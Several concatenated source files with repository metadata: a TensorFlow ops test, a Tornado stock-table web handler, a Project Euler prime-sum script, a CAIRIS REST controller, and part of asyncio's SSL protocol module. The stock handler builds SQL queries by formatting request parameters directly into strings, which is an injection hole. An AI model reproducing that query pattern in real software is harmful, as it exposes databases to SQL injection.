"^hidden1/hidden1/weights", # Same prefix. Should strip.
"loc:@hidden1/hidden1/weights", # Same prefix. Should strip.
"hhidden1/hidden1/weights", # Different prefix. Should keep.
"hidden1"
] # Not a prefix. Should keep.
expected_striped = [
"hidden1/weights", "hidden1/weights", "^hidden1/weights",
"loc:@hidden1/weights", "hhidden1/hidden1/weights", "hidden1"
]
expected_prepended = [
"hidden2/hidden1/weights", "hidden2/hidden1/weights",
"^hidden2/hidden1/weights", "loc:@hidden2/hidden1/weights",
"hidden2/hhidden1/hidden1/weights", "hidden2/hidden1"
]
name_scope_to_strip = "hidden1"
name_scope_to_add = "hidden2"
for es, ep, s in zip(expected_striped, expected_prepended, strs):
striped = ops.strip_name_scope(s, name_scope_to_strip)
self.assertEqual(es, striped)
self.assertEqual(ep, ops.prepend_name_scope(striped, name_scope_to_add))
def testGetNameScope(self):
with ops.Graph().as_default() as g:
with ops.name_scope("scope1"):
with ops.name_scope("scope2"):
with ops.name_scope("scope3"):
self.assertEqual("scope1/scope2/scope3", g.get_name_scope())
self.assertEqual("scope1/scope2", g.get_name_scope())
self.assertEqual("scope1", g.get_name_scope())
self.assertEqual("", g.get_name_scope())
def testTwoGraphs(self):
def f():
g1 = ops.Graph()
g2 = ops.Graph()
with g1.as_default():
with g2.as_default():
with ops.name_scope("_"):
pass
self.assertRaisesRegex(ValueError, "'_' is not a valid scope name", f)
class EnableEagerExecutionTest(test_util.TensorFlowTestCase):
@test_util.run_v1_only("b/120545219")
def testBadArgumentsToEnableEagerExecution(self):
with self.assertRaisesRegex(TypeError, "config must be a tf.ConfigProto"):
ops.enable_eager_execution(context.DEVICE_PLACEMENT_SILENT)
with self.assertRaisesRegex(ValueError, "device_policy must be one of"):
c = config_pb2.ConfigProto()
ops.enable_eager_execution(c, c)
with self.assertRaisesRegex(ValueError, "execution_mode must be one of"):
c = config_pb2.ConfigProto()
ops.enable_eager_execution(c, execution_mode=c)
class _TupleTensor(composite_tensor.CompositeTensor):
"""`Tensor`-like `tuple`-like for custom `Tensor` conversion masquerading."""
def __init__(self, components):
super(_TupleTensor, self).__init__()
self._components = tuple(ops.convert_to_tensor(c) for c in components)
@property
def _type_spec(self):
return _TupleTensorSpec(type_spec.from_value(c) for c in self._components)
def __getitem__(self, key):
return self._components[key]
def __len__(self):
return len(self._components)
def __iter__(self):
return iter(self._components)
class _TupleTensorSpec(type_spec.TypeSpec):
def __init__(self, specs):
self._specs = specs
value_type = property(lambda self: _TupleTensor)
_component_specs = property(lambda self: self._specs)
def _to_components(self, value):
return value._components
def _from_components(self, components):
return _TupleTensor(*components)
def _serialize(self):
return (self._specs,)
class _MyTuple(object):
"""Pretend user-side class for `ConvertToCompositeTensorTest ."""
def __init__(self, components):
super(_MyTuple, self).__init__()
self._components = tuple(components)
def __getitem__(self, key):
return self._components[key]
def __len__(self):
return len(self._components)
def __iter__(self):
return iter(self._components)
ops.register_tensor_conversion_function(
_MyTuple, conversion_func=lambda x, *_, **__: _TupleTensor(x))
class CustomConvertToCompositeTensorTest(test_util.TensorFlowTestCase):
@test_util.disable_tfrt("TODO(kkb): This makes Kokoro tests fail.")
def testCompositeTensorConversion(self):
"""Tests that a user can register a CompositeTensor converter."""
x = _MyTuple((1, [2., 3.], [[4, 5], [6, 7]]))
y = ops.convert_to_tensor_or_composite(x)
self.assertFalse(tensor_util.is_tf_type(y))
self.assertIsInstance(y, _TupleTensor)
self.assertLen(y, len(x))
for x_, y_ in zip(x, y):
self.assertIsInstance(y_, ops.Tensor)
self.assertTrue(tensor_util.is_tf_type(y_))
self.assertAllEqual(x_, tensor_util.constant_value(y_))
@test_util.disable_tfrt("Packing EagerTensors is not supported yet.")
class PackEagerTensorTest(test_util.TensorFlowTestCase):
def setUp(self):
super(PackEagerTensorTest, self).setUp()
context._reset_context()
cpus = config.list_physical_devices("CPU")
# Set 2 virtual CPUs
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration(),
])
def testPack(self):
with context.eager_mode():
with ops.device("CPU:0"):
var0 = resource_variable_ops.ResourceVariable(1.0)
c0 = constant_op.constant([[1.0, 2.0], [3.0, 4.0]])
with ops.device("CPU:1"):
var1 = resource_variable_ops.ResourceVariable(2.0)
var2 = resource_variable_ops.ResourceVariable([3.0])
c1 = constant_op.constant([9.0])
packed_var0 = ops.pack_eager_tensors([var0.handle, var1.handle])
self.assertTrue(packed_var0.is_packed)
self.assertEqual(packed_var0.dtype, var0.handle.dtype)
self.assertEqual(packed_var0.shape, var0.handle.shape)
self.assertEqual(packed_var0._handle_data, var0.handle._handle_data)
self.assertIn("COMPOSITE:0", packed_var0.device)
self.assertIn("COMPOSITE:0", packed_var0.backing_device)
with self.assertRaises(errors.InvalidArgumentError):
packed_var0.numpy()
# Different dtypes
with self.assertRaises(ValueError):
ops.pack_eager_tensors([var0.handle, c1])
# Different shapes
with self.assertRaises(ValueError):
ops.pack_eager_tensors([c0, c1])
# Different handle data
with self.assertRaises(ValueError):
ops.pack_eager_tensors([var0.handle, var2.handle])
class GraphDefInputShapesTest(test_util.TensorFlowTestCase):
def setUpInputShapes(self, pre_add_input_shapes):
test_tensor_shape = [None, 1, 1, 1]
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=test_tensor_shape, dtype=dtypes.float32)
])
def f(x):
return array_ops.identity(x, name="output")
x = array_ops.ones([2, 1, 1, 1], dtype=dtypes.float32)
f(x)
tensor_shape_proto = tensor_shape_pb2.TensorShapeProto(dim=[
tensor_shape_pb2.TensorShapeProto.Dim(size=-1 if d is None else d)
for d in test_tensor_shape
])
list_proto = attr_value_pb2.AttrValue.ListValue(shape=[tensor_shape_proto])
concrete_function = f.get_concrete_function()
if pre_add_input_shapes:
attr_value = attr_value_pb2.AttrValue(list=list_proto)
concrete_function = eager_function.ConcreteFunction(
concrete_function.graph,
attrs={"_input_shapes": attr_value},
function_spec=concrete_function._pre_initialized_function_spec)
test_graph = ops.Graph()
with test_graph.as_default():
concrete_function.add_to_graph(g=test_graph)
graph_def = test_graph.as_graph_def(add_shapes=True)
self.assertLen(graph_def.library.function, 1)
function_def = graph_def.library.function[0]
input_shapes = function_def.attr["_input_shapes"]
return input_shapes
def testGraphDefInputShapes(self):
pre_added_input_shapes = self.setUpInputShapes(pre_add_input_shapes=True)
post_added_input_shapes = self.setUpInputShapes(pre_add_input_shapes=False)
self.assertProtoEquals(pre_added_input_shapes, post_added_input_shapes)
class TensorTest(test_util.TensorFlowTestCase):
def testToArrayEagerMode(self):
with context.eager_mode():
a = np.array(constant_op.constant(32), dtype=np.float32)
b = np.array(constant_op.constant(32, dtype=dtypes.int64))
self.assertEqual(a.dtype, np.dtype(np.float32))
self.assertEqual(b.dtype, np.dtype(np.int64))
def testToArrayFunctionMode(self):
@def_function.function
def f():
# Raises during trace compilation.
return np.array(constant_op.constant(32), dtype=np.int32)
@def_function.function
def g():
# Raises during trace compilation.
return np.array(constant_op.constant(32))
with self.assertRaisesRegex(NotImplementedError,
"Cannot convert a symbolic Tensor"):
f()
with self.assertRaisesRegex(NotImplementedError,
"Cannot convert a symbolic Tensor"):
g()
if __name__ == "__main__":
googletest.main()
| 37.145455 | 97 | 0.657143 |
c33e3dddcadc8eb9b4977377c1b3c3f11492854b | 7,624 | py | Python | web/dataTableHandler.py | haoduohaoduo/stock | 6f1b613d375a8692e1d99bf1a417b769a0b8ee50 | [
"Apache-2.0"
] | 1 | 2021-08-01T07:39:08.000Z | 2021-08-01T07:39:08.000Z | web/dataTableHandler.py | haoduohaoduo/stock | 6f1b613d375a8692e1d99bf1a417b769a0b8ee50 | [
"Apache-2.0"
] | null | null | null | web/dataTableHandler.py | haoduohaoduo/stock | 6f1b613d375a8692e1d99bf1a417b769a0b8ee50 | [
"Apache-2.0"
] | 1 | 2021-11-26T07:37:43.000Z | 2021-11-26T07:37:43.000Z | #!/usr/local/bin/python3
# -*- coding: utf-8 -*-
import json
from tornado import gen
import libs.stock_web_dic as stock_web_dic
import web.base as webBase
import logging
import datetime
# info 蓝色 云财经
# success 绿色
# danger 红色 东方财富
# warning 黄色
WEB_EASTMONEY_URL = u"""
<a class='btn btn-danger btn-xs tooltip-danger' data-rel="tooltip" data-placement="right" data-original-title="东方财富,股票详细地址,新窗口跳转。"
href='http://quote.eastmoney.com/%s.html' target='_blank'>东财</a>
<a class='btn btn-success btn-xs tooltip-success' data-rel="tooltip" data-placement="right" data-original-title="本地MACD,KDJ等指标,本地弹窗窗口,数据加载中,请稍候。"
onclick="showIndicatorsWindow('%s');">指标</a>
<a class='btn btn-warning btn-xs tooltip-warning' data-rel="tooltip" data-placement="right" data-original-title="东方财富,研报地址,本地弹窗窗口。"
onclick="showDFCFWindow('%s');">东研</a>
"""
# 和在dic中的字符串一致。字符串前面都不特别声明是u""
eastmoney_name = "查看股票"
# 获得页面数据。
class GetStockHtmlHandler(webBase.BaseHandler):
@gen.coroutine
def get(self):
name = self.get_argument("table_name", default=None, strip=False)
stockWeb = stock_web_dic.STOCK_WEB_DATA_MAP[name]
# self.uri_ = ("self.request.url:", self.request.uri)
# print self.uri_
date_now = datetime.datetime.now()
date_now_str = date_now.strftime("%Y%m%d")
# 每天的 16 点前显示昨天数据。
if date_now.hour < 16:
date_now_str = (date_now + datetime.timedelta(days=-1)).strftime("%Y%m%d")
try:
# 增加columns 字段中的【查看股票 东方财富】
logging.info(eastmoney_name in stockWeb.column_names)
if eastmoney_name in stockWeb.column_names:
tmp_idx = stockWeb.column_names.index(eastmoney_name)
logging.info(tmp_idx)
try:
# 防止重复插入数据。可能会报错。
stockWeb.columns.remove("eastmoney_url")
except Exception as e:
print("error :", e)
stockWeb.columns.insert(tmp_idx, "eastmoney_url")
except Exception as e:
print("error :", e)
logging.info("####################GetStockHtmlHandlerEnd")
self.render("stock_web.html", stockWeb=stockWeb, date_now=date_now_str,
leftMenu=webBase.GetLeftMenu(self.request.uri))
# 获得股票数据内容。
class GetStockDataHandler(webBase.BaseHandler):
def get(self):
# 获得分页参数。
start_param = self.get_argument("start", default=0, strip=False)
length_param = self.get_argument("length", default=10, strip=False)
print("page param:", length_param, start_param)
name_param = self.get_argument("name", default=None, strip=False)
type_param = self.get_argument("type", default=None, strip=False)
stock_web = stock_web_dic.STOCK_WEB_DATA_MAP[name_param]
# https://datatables.net/manual/server-side
self.set_header('Content-Type', 'application/json;charset=UTF-8')
order_by_column = []
order_by_dir = []
# 支持多排序。使用shift+鼠标左键。
for item, val in self.request.arguments.items():
# logging.info("item: %s, val: %s" % (item, val) )
if str(item).startswith("order["):
print("order:", item, ",val:", val[0])
if str(item).startswith("order[") and str(item).endswith("[column]"):
order_by_column.append(int(val[0]))
if str(item).startswith("order[") and str(item).endswith("[dir]"):
order_by_dir.append(val[0].decode("utf-8")) # bytes转换字符串
search_by_column = []
search_by_data = []
# 返回search字段。
for item, val in self.request.arguments.items():
# logging.info("item: %s, val: %s" % (item, val))
if str(item).startswith("columns[") and str(item).endswith("[search][value]"):
logging.info("item: %s, val: %s" % (item, val))
str_idx = item.replace("columns[", "").replace("][search][value]", "")
int_idx = int(str_idx)
# 找到字符串
str_val = val[0].decode("utf-8")
if str_val != "": # 字符串。
search_by_column.append(stock_web.columns[int_idx])
search_by_data.append(val[0].decode("utf-8")) # bytes转换字符串
# 打印日志。
search_sql = ""
search_idx = 0
logging.info(search_by_column)
logging.info(search_by_data)
for item in search_by_column:
val = search_by_data[search_idx]
logging.info("idx: %s, column: %s, value: %s " % (search_idx, item, val))
# 查询sql
if search_idx == 0:
search_sql = " WHERE `%s` = '%s' " % (item, val)
else:
search_sql = search_sql + " AND `%s` = '%s' " % (item, val)
search_idx = search_idx + 1
# print("stockWeb :", stock_web)
order_by_sql = ""
# 增加排序。
if len(order_by_column) != 0 and len(order_by_dir) != 0:
order_by_sql = " ORDER BY "
idx = 0
for key in order_by_column:
# 找到排序字段和dir。
col_tmp = stock_web.columns[key]
dir_tmp = order_by_dir[idx]
if idx != 0:
order_by_sql += " ,cast(`%s` as decimal) %s" % (col_tmp, dir_tmp)
else:
order_by_sql += " cast(`%s` as decimal) %s" % (col_tmp, dir_tmp)
idx += 1
# 查询数据库。
limit_sql = ""
if int(length_param) > 0:
limit_sql = " LIMIT %s , %s " % (start_param, length_param)
sql = " SELECT * FROM `%s` %s %s %s " % (
stock_web.table_name, search_sql, order_by_sql, limit_sql)
count_sql = " SELECT count(1) as num FROM `%s` %s " % (stock_web.table_name, search_sql)
logging.info("select sql : " + sql)
logging.info("count sql : " + count_sql)
stock_web_list = self.db.query(sql)
for tmp_obj in (stock_web_list):
logging.info("####################")
if type_param == "editor":
tmp_obj["DT_RowId"] = tmp_obj[stock_web.columns[0]]
# logging.info(tmp_obj)
try:
# 增加columns 字段中的【东方财富】
logging.info("eastmoney_name : %s " % eastmoney_name)
if eastmoney_name in stock_web.column_names:
tmp_idx = stock_web.column_names.index(eastmoney_name)
code_tmp = tmp_obj["code"]
# 判断上海还是 深圳,东方财富 接口要求。
if code_tmp.startswith("6"):
code_tmp = "SH" + code_tmp
else:
code_tmp = "SZ" + code_tmp
tmp_url = WEB_EASTMONEY_URL % (tmp_obj["code"], tmp_obj["code"], code_tmp)
tmp_obj["eastmoney_url"] = tmp_url
logging.info(tmp_idx)
logging.info(tmp_obj["eastmoney_url"])
# logging.info(type(tmp_obj))
# tmp.column_names.insert(tmp_idx, eastmoney_name)
except Exception as e:
print("error :", e)
stock_web_size = self.db.query(count_sql)
logging.info("stockWebList size : %s " % stock_web_size)
obj = {
"draw": 0,
"recordsTotal": stock_web_size[0]["num"],
"recordsFiltered": stock_web_size[0]["num"],
"data": stock_web_list
}
# logging.info("####################")
# logging.info(obj)
self.write(json.dumps(obj))
| 40.338624 | 149 | 0.552859 |
f9d110588df578559f1e77355414cc3f41868188 | 342 | py | Python | ProjectEuler/Task010_SumPrimes.py | greendwin/puzzles | 5df1175f178d0c3e1ffa765160057d90e9da37cd | [
"MIT"
] | null | null | null | ProjectEuler/Task010_SumPrimes.py | greendwin/puzzles | 5df1175f178d0c3e1ffa765160057d90e9da37cd | [
"MIT"
] | null | null | null | ProjectEuler/Task010_SumPrimes.py | greendwin/puzzles | 5df1175f178d0c3e1ffa765160057d90e9da37cd | [
"MIT"
] | null | null | null |
PRIMES = []
def check_prime_inc(N):
for x in PRIMES:
if x * x > N:
break
if N % x == 0:
return
PRIMES.append(N)
return N
def iter_primes(N):
for x in xrange(2, N):
if check_prime_inc(x):
yield x
if __name__ == '__main__':
print sum(iter_primes(2000000))
| 14.25 | 35 | 0.511696 |
ab2dcbab8d79624c2225bc1f14182246dac3e864 | 10,041 | py | Python | cairis/controllers/ResponseController.py | RAIJ95/https-github.com-failys-cairis | 86601347ea016f4a3f90b6942093d63e91de5f74 | [
"Apache-2.0"
] | null | null | null | cairis/controllers/ResponseController.py | RAIJ95/https-github.com-failys-cairis | 86601347ea016f4a3f90b6942093d63e91de5f74 | [
"Apache-2.0"
] | null | null | null | cairis/controllers/ResponseController.py | RAIJ95/https-github.com-failys-cairis | 86601347ea016f4a3f90b6942093d63e91de5f74 | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import httplib
from flask import session, request, make_response
from flask_restful import Resource
from flask_restful_swagger import swagger
from cairis.daemon.CairisHTTPError import MalformedJSONHTTPError, ARMHTTPError, ObjectNotFoundHTTPError
from cairis.data.ResponseDAO import ResponseDAO
from cairis.tools.JsonConverter import json_serialize
from cairis.tools.MessageDefinitions import ResponseMessage
from cairis.tools.ModelDefinitions import ResponseModel as SwaggerResponseModel
from cairis.tools.SessionValidator import get_session_id
__author__ = 'Robin Quetin'
class ResponsesAPI(Resource):
#region Swagger Doc
@swagger.operation(
notes='Get all responses',
responseClass=SwaggerResponseModel.__name__,
nickname='responses-get',
parameters=[
{
"name": "session_id",
"description": "The ID of the user's session",
"required": False,
"allowMultiple": False,
"dataType": str.__name__,
"paramType": "query"
},
{
"name": "constraint_id",
"description": "An ID used to filter the responses",
"required": False,
"default": -1,
"allowMultiple": False,
"dataType": int.__name__,
"paramType": "query"
}
],
responseMessages=[
{
"code": httplib.BAD_REQUEST,
"message": "The database connection was not properly set up"
}
]
)
#endregion
def get(self):
session_id = get_session_id(session, request)
constraint_id = request.args.get('constraint_id', -1)
dao = ResponseDAO(session_id)
responses = dao.get_responses(constraint_id)
resp = make_response(json_serialize(responses, session_id=session_id), httplib.OK)
resp.contenttype = 'application/json'
return resp
#region Swagger Docs
@swagger.operation(
notes='Add a new response',
nickname='responses-post',
parameters=[
{
"name": "body",
"description": "The session ID and the serialized version of the asset to be updated",
"required": True,
"allowMultiple": False,
"type": ResponseMessage.__name__,
"paramType": "body"
},
{
"name": "session_id",
"description": "The ID of the user's session",
"required": False,
"allowMultiple": False,
"dataType": str.__name__,
"paramType": "query"
}
],
responseMessages=[
{
"code": httplib.BAD_REQUEST,
"message": "The database connection was not properly set up"
},
{
"code": MalformedJSONHTTPError.status_code,
"message": MalformedJSONHTTPError.status
},
{
"code": ARMHTTPError.status_code,
"message": ARMHTTPError.status
}
]
)
#endregion
def post(self):
session_id = get_session_id(session, request)
dao = ResponseDAO(session_id)
response = dao.from_json(request)
response_id = dao.add_response(response)
resp_dict = {'message': 'Response successfully added', 'response_id': response_id}
resp = make_response(json_serialize(resp_dict), httplib.OK)
resp.contenttype = 'application/json'
return resp
class ResponseByNameAPI(Resource):
#region Swagger Docs
@swagger.operation(
notes='Get a response by name',
nickname='response-by-name-get',
responseClass=SwaggerResponseModel.__name__,
parameters=[
{
"name": "session_id",
"description": "The ID of the user's session",
"required": False,
"allowMultiple": False,
"dataType": str.__name__,
"paramType": "query"
}
],
responseMessages=[
{
"code": httplib.BAD_REQUEST,
"message": "The database connection was not properly set up"
}
]
)
#endregion
def get(self, name):
session_id = get_session_id(session, request)
dao = ResponseDAO(session_id)
found_response = dao.get_response_by_name(name)
dao.close()
resp = make_response(json_serialize(found_response, session_id=session_id), httplib.OK)
resp.headers['Content-type'] = 'application/json'
return resp
# region Swagger Doc
@swagger.operation(
notes='Updates an existing response',
nickname='response-by-name-put',
parameters=[
{
"name": "body",
"description": "The session ID and the serialized version of the asset to be updated",
"required": True,
"allowMultiple": False,
"type": SwaggerResponseModel.__name__,
"paramType": "body"
},
{
"name": "session_id",
"description": "The ID of the user's session",
"required": False,
"allowMultiple": False,
"dataType": str.__name__,
"paramType": "query"
}
],
responseMessages=[
{
'code': httplib.BAD_REQUEST,
'message': 'One or more attributes are missing'
},
{
'code': httplib.CONFLICT,
'message': 'Some problems were found during the name check'
},
{
'code': ObjectNotFoundHTTPError.status_code,
'message': ObjectNotFoundHTTPError.status
},
{
'code': ARMHTTPError.status_code,
'message': ARMHTTPError.status
}
]
)
# endregion
def put(self, name):
session_id = get_session_id(session, request)
dao = ResponseDAO(session_id)
new_response = dao.from_json(request)
dao.update_response(name, new_response)
dao.close()
resp_dict = {'message': 'Response successfully updated'}
resp = make_response(json_serialize(resp_dict), httplib.OK)
resp.headers['Content-type'] = 'application/json'
return resp
# region Swagger Doc
@swagger.operation(
notes='Delete an existing response',
nickname='response-name-delete',
parameters=[
{
"name": "session_id",
"description": "The ID of the user's session",
"required": False,
"allowMultiple": False,
"dataType": str.__name__,
"paramType": "query"
}
],
responseMessages=[
{
'code': httplib.BAD_REQUEST,
'message': 'One or more attributes are missing'
},
{
'code': httplib.CONFLICT,
'message': 'Some problems were found during the name check'
},
{
'code': ObjectNotFoundHTTPError.status_code,
'message': ObjectNotFoundHTTPError.status
},
{
'code': ARMHTTPError.status_code,
'message': ARMHTTPError.status
}
]
)
# endregion
def delete(self, name):
session_id = get_session_id(session, request)
dao = ResponseDAO(session_id)
dao.delete_response(name)
dao.close()
resp_dict = {'message': 'Response successfully deleted'}
resp = make_response(json_serialize(resp_dict), httplib.OK)
resp.headers['Content-type'] = 'application/json'
return resp
class ResponseByNameGenerateAPI(Resource):
#region Swagger Docs
@swagger.operation(
notes='Generate goals based on a response name',
nickname='response-by-name-generate_goal',
responseClass=SwaggerResponseModel.__name__,
parameters=[
{
"name": "session_id",
"description": "The ID of the user's session",
"required": False,
"allowMultiple": False,
"dataType": str.__name__,
"paramType": "query"
}
],
responseMessages=[
{
"code": httplib.BAD_REQUEST,
"message": "The database connection was not properly set up"
}
]
)
#endregion
def post(self, name):
session_id = get_session_id(session, request)
dao = ResponseDAO(session_id)
dao.generate_goal(name)
dao.close()
resp_dict = {'message': 'Goal successfully generated'}
resp = make_response(json_serialize(resp_dict), httplib.OK)
resp.headers['Content-type'] = 'application/json'
return resp
| 33.922297 | 103 | 0.558012 |
15eb9c78443af7f81ff0a8305327572ac6749a94 | 26,951 | py | Python | Lib/asyncio/sslproto.py | Neeky/cpython-3.7.3 | 2b6d6a6132ad497e9ce70a3358468099dd407b2a | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | Lib/asyncio/sslproto.py | Neeky/cpython-3.7.3 | 2b6d6a6132ad497e9ce70a3358468099dd407b2a | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | Lib/asyncio/sslproto.py | Neeky/cpython-3.7.3 | 2b6d6a6132ad497e9ce70a3358468099dd407b2a | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | import collections
import warnings
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from . import base_events
from . import constants
from . import protocols
from . import transports
from .log import logger
def _create_transport_context(server_side, server_hostname):
if server_side:
raise ValueError('Server side SSL needs a valid SSLContext')
# Client side may pass ssl=True to use a default
# context; in that case the sslcontext passed is None.
# The default is secure for client connections.
# Python 3.4+: use up-to-date strong settings.
sslcontext = ssl.create_default_context()
if not server_hostname:
sslcontext.check_hostname = False
return sslcontext
# States of an _SSLPipe.
_UNWRAPPED = "UNWRAPPED"
_DO_HANDSHAKE = "DO_HANDSHAKE"
_WRAPPED = "WRAPPED"
_SHUTDOWN = "SHUTDOWN"
class _SSLPipe(object):
"""An SSL "Pipe".
An SSL pipe allows you to communicate with an SSL/TLS protocol instance
through memory buffers. It can be used to implement a security layer for an
existing connection where you don't have access to the connection's file
descriptor, or for some reason you don't want to use it.
An SSL pipe can be in "wrapped" and "unwrapped" mode. In unwrapped mode,
data is passed through untransformed. In wrapped mode, application level
data is encrypted to SSL record level data and vice versa. The SSL record
level is the lowest level in the SSL protocol suite and is what travels
as-is over the wire.
An SslPipe initially is in "unwrapped" mode. To start SSL, call
do_handshake(). To shutdown SSL again, call unwrap().
"""
max_size = 256 * 1024 # Buffer size passed to read()
def __init__(self, context, server_side, server_hostname=None):
"""
The *context* argument specifies the ssl.SSLContext to use.
The *server_side* argument indicates whether this is a server side or
client side transport.
The optional *server_hostname* argument can be used to specify the
hostname you are connecting to. You may only specify this parameter if
the _ssl module supports Server Name Indication (SNI).
"""
self._context = context
self._server_side = server_side
self._server_hostname = server_hostname
self._state = _UNWRAPPED
self._incoming = ssl.MemoryBIO()
self._outgoing = ssl.MemoryBIO()
self._sslobj = None
self._need_ssldata = False
self._handshake_cb = None
self._shutdown_cb = None
@property
def context(self):
"""The SSL context passed to the constructor."""
return self._context
@property
def ssl_object(self):
"""The internal ssl.SSLObject instance.
Return None if the pipe is not wrapped.
"""
return self._sslobj
@property
def need_ssldata(self):
"""Whether more record level data is needed to complete a handshake
that is currently in progress."""
return self._need_ssldata
@property
def wrapped(self):
"""
Whether a security layer is currently in effect.
Return False during handshake.
"""
return self._state == _WRAPPED
def do_handshake(self, callback=None):
"""Start the SSL handshake.
Return a list of ssldata. A ssldata element is a list of buffers
The optional *callback* argument can be used to install a callback that
will be called when the handshake is complete. The callback will be
called with None if successful, else an exception instance.
"""
if self._state != _UNWRAPPED:
raise RuntimeError('handshake in progress or completed')
self._sslobj = self._context.wrap_bio(
self._incoming, self._outgoing,
server_side=self._server_side,
server_hostname=self._server_hostname)
self._state = _DO_HANDSHAKE
self._handshake_cb = callback
ssldata, appdata = self.feed_ssldata(b'', only_handshake=True)
assert len(appdata) == 0
return ssldata
def shutdown(self, callback=None):
"""Start the SSL shutdown sequence.
Return a list of ssldata. A ssldata element is a list of buffers
The optional *callback* argument can be used to install a callback that
will be called when the shutdown is complete. The callback will be
called without arguments.
"""
if self._state == _UNWRAPPED:
raise RuntimeError('no security layer present')
if self._state == _SHUTDOWN:
raise RuntimeError('shutdown in progress')
assert self._state in (_WRAPPED, _DO_HANDSHAKE)
self._state = _SHUTDOWN
self._shutdown_cb = callback
ssldata, appdata = self.feed_ssldata(b'')
assert appdata == [] or appdata == [b'']
return ssldata
def feed_eof(self):
"""Send a potentially "ragged" EOF.
This method will raise an SSL_ERROR_EOF exception if the EOF is
unexpected.
"""
self._incoming.write_eof()
ssldata, appdata = self.feed_ssldata(b'')
assert appdata == [] or appdata == [b'']
def feed_ssldata(self, data, only_handshake=False):
"""Feed SSL record level data into the pipe.
The data must be a bytes instance. It is OK to send an empty bytes
instance. This can be used to get ssldata for a handshake initiated by
this endpoint.
Return a (ssldata, appdata) tuple. The ssldata element is a list of
buffers containing SSL data that needs to be sent to the remote SSL.
The appdata element is a list of buffers containing plaintext data that
needs to be forwarded to the application. The appdata list may contain
an empty buffer indicating an SSL "close_notify" alert. This alert must
be acknowledged by calling shutdown().
"""
if self._state == _UNWRAPPED:
# If unwrapped, pass plaintext data straight through.
if data:
appdata = [data]
else:
appdata = []
return ([], appdata)
self._need_ssldata = False
if data:
self._incoming.write(data)
ssldata = []
appdata = []
try:
if self._state == _DO_HANDSHAKE:
# Call do_handshake() until it doesn't raise anymore.
self._sslobj.do_handshake()
self._state = _WRAPPED
if self._handshake_cb:
self._handshake_cb(None)
if only_handshake:
return (ssldata, appdata)
# Handshake done: execute the wrapped block
if self._state == _WRAPPED:
# Main state: read data from SSL until close_notify
while True:
chunk = self._sslobj.read(self.max_size)
appdata.append(chunk)
if not chunk: # close_notify
break
elif self._state == _SHUTDOWN:
# Call shutdown() until it doesn't raise anymore.
self._sslobj.unwrap()
self._sslobj = None
self._state = _UNWRAPPED
if self._shutdown_cb:
self._shutdown_cb()
elif self._state == _UNWRAPPED:
# Drain possible plaintext data after close_notify.
appdata.append(self._incoming.read())
except (ssl.SSLError, ssl.CertificateError) as exc:
exc_errno = getattr(exc, 'errno', None)
if exc_errno not in (
ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE,
ssl.SSL_ERROR_SYSCALL):
if self._state == _DO_HANDSHAKE and self._handshake_cb:
self._handshake_cb(exc)
raise
self._need_ssldata = (exc_errno == ssl.SSL_ERROR_WANT_READ)
# Check for record level data that needs to be sent back.
# Happens for the initial handshake and renegotiations.
if self._outgoing.pending:
ssldata.append(self._outgoing.read())
return (ssldata, appdata)
def feed_appdata(self, data, offset=0):
"""Feed plaintext data into the pipe.
Return an (ssldata, offset) tuple. The ssldata element is a list of
buffers containing record level data that needs to be sent to the
remote SSL instance. The offset is the number of plaintext bytes that
were processed, which may be less than the length of data.
NOTE: In case of short writes, this call MUST be retried with the SAME
buffer passed into the *data* argument (i.e. the id() must be the
same). This is an OpenSSL requirement. A further particularity is that
a short write will always have offset == 0, because the _ssl module
does not enable partial writes. And even though the offset is zero,
there will still be encrypted data in ssldata.
"""
assert 0 <= offset <= len(data)
if self._state == _UNWRAPPED:
# pass through data in unwrapped mode
if offset < len(data):
ssldata = [data[offset:]]
else:
ssldata = []
return (ssldata, len(data))
ssldata = []
view = memoryview(data)
while True:
self._need_ssldata = False
try:
if offset < len(view):
offset += self._sslobj.write(view[offset:])
except ssl.SSLError as exc:
# It is not allowed to call write() after unwrap() until the
# close_notify is acknowledged. We return the condition to the
# caller as a short write.
exc_errno = getattr(exc, 'errno', None)
if exc.reason == 'PROTOCOL_IS_SHUTDOWN':
exc_errno = exc.errno = ssl.SSL_ERROR_WANT_READ
if exc_errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE,
ssl.SSL_ERROR_SYSCALL):
raise
self._need_ssldata = (exc_errno == ssl.SSL_ERROR_WANT_READ)
# See if there's any record level data back for us.
if self._outgoing.pending:
ssldata.append(self._outgoing.read())
if offset == len(view) or self._need_ssldata:
break
return (ssldata, offset)
class _SSLProtocolTransport(transports._FlowControlMixin,
transports.Transport):
_sendfile_compatible = constants._SendfileMode.FALLBACK
def __init__(self, loop, ssl_protocol):
self._loop = loop
# SSLProtocol instance
self._ssl_protocol = ssl_protocol
self._closed = False
def get_extra_info(self, name, default=None):
"""Get optional transport information."""
return self._ssl_protocol._get_extra_info(name, default)
def set_protocol(self, protocol):
self._ssl_protocol._set_app_protocol(protocol)
def get_protocol(self):
return self._ssl_protocol._app_protocol
def is_closing(self):
return self._closed
def close(self):
"""Close the transport.
Buffered data will be flushed asynchronously. No more data
will be received. After all buffered data is flushed, the
protocol's connection_lost() method will (eventually) called
with None as its argument.
"""
self._closed = True
self._ssl_protocol._start_shutdown()
def __del__(self):
if not self._closed:
warnings.warn(f"unclosed transport {self!r}", ResourceWarning,
source=self)
self.close()
def is_reading(self):
tr = self._ssl_protocol._transport
if tr is None:
raise RuntimeError('SSL transport has not been initialized yet')
return tr.is_reading()
def pause_reading(self):
"""Pause the receiving end.
No data will be passed to the protocol's data_received()
method until resume_reading() is called.
"""
